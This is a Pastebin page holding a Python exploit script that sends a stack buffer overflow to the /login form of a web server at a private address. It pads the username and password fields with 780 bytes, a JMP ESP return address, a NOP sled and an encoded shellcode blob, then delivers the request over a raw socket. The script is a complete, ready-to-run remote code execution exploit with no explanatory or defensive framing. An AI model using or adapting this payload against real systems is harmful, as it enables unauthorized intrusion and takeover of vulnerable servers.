Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import socket
- import time
- host = '192.168.2.19'
- port = 8080
- def send_payload(payload):
- evil = "POST /login HTTP/1.1\r\n"
- evil += "Host: 192.168.2.19\r\n"
- evil += "User-Agent: Mozilla/5.0\r\n"
- evil += "Connection: close\r\n"
- evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
- evil += "Accept-Language: en-us,en;q=0.5\r\n"
- evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
- evil += "Keep-Alive: 300\r\n"
- evil += "Proxy-Connection: keep-alive\r\n"
- evil += "Content-Type: application/x-www-form-urlencoded\r\n"
- evil += "Content-Length: 17000\r\n\r\n"
- evil += "username=" + payload
- evil += "&password=" + payload + "\r\n"
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connect = s.connect((host, port))
- s.send(evil)
- s.close()
- shellcode = ("\xda\xc0\xbf\x6d\xc8\xba\x9a\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
- "\x56\x31\x7a\x18\x83\xea\xfc\x03\x7a\x79\x2a\x4f\x66\x69\x28"
- "\xb0\x97\x69\x4d\x38\x72\x58\x4d\x5e\xf6\xca\x7d\x14\x5a\xe6"
- "\xf6\x78\x4f\x7d\x7a\x55\x60\x36\x31\x83\x4f\xc7\x6a\xf7\xce"
- "\x4b\x71\x24\x31\x72\xba\x39\x30\xb3\xa7\xb0\x60\x6c\xa3\x67"
- "\x95\x19\xf9\xbb\x1e\x51\xef\xbb\xc3\x21\x0e\xed\x55\x3a\x49"
- "\x2d\x57\xef\xe1\x64\x4f\xec\xcc\x3f\xe4\xc6\xbb\xc1\x2c\x17"
- "\x43\x6d\x11\x98\xb6\x6f\x55\x1e\x29\x1a\xaf\x5d\xd4\x1d\x74"
- "\x1c\x02\xab\x6f\x86\xc1\x0b\x54\x37\x05\xcd\x1f\x3b\xe2\x99"
- "\x78\x5f\xf5\x4e\xf3\x5b\x7e\x71\xd4\xea\xc4\x56\xf0\xb7\x9f"
- "\xf7\xa1\x1d\x71\x07\xb1\xfe\x2e\xad\xb9\x12\x3a\xdc\xe3\x7a"
- "\x8f\xed\x1b\x7a\x87\x66\x6f\x48\x08\xdd\xe7\xe0\xc1\xfb\xf0"
- "\x71\xc5\xfb\x2f\x39\x86\x05\xd0\x39\x8e\xc1\x84\x69\xb8\xe0"
- "\xa4\xe2\x38\x0c\x71\x9e\x32\x9a\xba\xf6\x41\x4d\x53\x04\x46"
- "\x60\xff\x81\xa0\xd2\xaf\xc1\x7c\x93\x1f\xa1\x2c\x7b\x4a\x2e"
- "\x12\x9b\x75\xe5\x3b\x36\x9a\x53\x13\xaf\x03\xfe\xef\x4e\xcb"
- "\xd5\x95\x51\x47\xdf\x6a\x1f\xa0\xaa\x78\x48\xd7\x54\x81\x89"
- "\x72\x54\xeb\x8d\xd4\x03\x83\x8f\x01\x63\x0c\x6f\x64\xf0\x4b"
- "\x8f\xf9\xc0\x20\xa6\x6f\x6c\x5f\xc7\x7f\x6c\x9f\x91\x15\x6c"
- "\xf7\x45\x4e\x3f\xe2\x89\x5b\x2c\xbf\x1f\x64\x04\x13\xb7\x0c"
- "\xaa\x4a\xff\x92\x55\xb9\x83\xd5\xa9\x3f\xac\x7d\xc1\xbf\xec"
- "\x7d\x11\xaa\xec\x2d\x79\x21\xc2\xc2\x49\xca\xc9\x8a\xc1\x41"
- "\x9c\x79\x70\x55\xb5\xdc\x2c\x56\x3a\xc5\xdf\x2d\x33\xfa\x20"
- "\xd2\x5d\x9f\x21\xd2\x61\xa1\x1e\x04\x58\xd7\x61\x94\xdf\xe8"
- "\xd4\xb9\x76\x63\x16\xed\x89\xa6")
- if __name__ == '__main__':
- # [*] Exact match at offset 780
- offset = 780
- maxsize = 10000
- jmpesp = '\x33\x5D\xCA\x77'
- payload = 'A' * offset + jmpesp + '\x90' * 100 + shellcode + '\x90'* (maxsize - offset - 4 - len(shellcode) - 100)
- send_payload(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement